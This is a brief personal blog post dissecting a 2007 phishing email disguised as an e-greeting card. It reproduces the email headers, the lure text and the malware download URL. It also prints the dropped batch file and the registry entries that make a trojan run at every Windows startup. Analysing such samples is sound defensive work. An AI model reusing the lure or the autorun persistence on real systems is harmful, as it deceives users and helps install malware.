* endellion.me.uk

postcard.gif.exe -- the third one

 

From All-Yours.net Greeting Cards Mon May 7 17:46:28 2007
X-Apparently-To: yeahright@yahoo.co.uk via 217.146.189.84; Mon, 07 May 2007 17:49:52 +0000
X-YahooFilteredBulk: 67.55.48.150
X-Originating-IP: [67.55.48.150]
Return-Path: <no-reply@all-yours.net>
Authentication-Results: mta126.mail.ukl.yahoo.com from=all-yours.net; domainkeys=neutral (no sig)
Received: from 67.55.48.150 (EHLO host72.host72-server.com) (67.55.48.150) by mta126.mail.ukl.yahoo.com with SMTP; Mon, 07 May 2007 17:49:52 +0000
X-ClientAddr: 64.126.105.194
Received: from User (64-126-105-194.static.everestkc.net [64.126.105.194]) (authenticated bits=0) by host72.host72-server.com (8.12.11/8.12.11) with ESMTP id l47IEni1027067; Mon, 7 May 2007 14:14:49 -0400
Message-Id: <200705071814.l47IEni1027067@host72.host72-server.com>
From: "All-Yours.net Greeting Cards" <no-reply@all-yours.net>  
Subject: You have recived a greeting card from a friend!
Date: Mon, 7 May 2007 12:46:28 -0500
MIME-Version: 1.0
Content-Type: text/html; charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-yoursite-MailScanner-Information: Please contact the ISP for more information
X-yoursite-MailScanner: Found to be clean
X-MailScanner-From: no-reply@all-yours.net
Content-Length: 880

 

Hello , .

A Greeting Card is waiting for you at our virtual post office! You can pick up your postcard at the following web address:

.http://www.all-yours.net/u/view.php?id=a0190313376667

.If you can't click on the web address above, you can also visit E-Greetings at http://www.all-yours.net/ and enter your pickup code, which is: a0190313376667

.(Your postcard will be available for 60 days.)

.Oh -- and if you'd like to reply with a postcard, you can do so by visiting this web address:http://www.all-yours.net/ (Or you can simply click the "reply to this postcard" button beneath your postcard!)

.We hope you enjoy your postcard, and if you do, please take a moment to send a few yourself!

.Regards,
1001 E-Greetings and Postcards
http:///www.all-yours.net/

 

Well there you have it, the email with headers and all. Of course all-yours.net is not the actual address the links refer to. Instead it's off to http://200.107.49.137/postcard.gif.exe, awhere a little archive awaits us. Sized at 227 KB.

content of rar

sup.bat contains:

@regedit /s sup.reg
@exit

sup.reg contains

REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"taskmgr"="C:\\WINNT\\system32\\explorer.exe"
"IExplorer"="C:\\WINDOWS\\system32\\explorer.exe"

Norton reckons the "explorer.exe" to be an "IRC Trojan" and its technical details given are not very technical. My kind of people!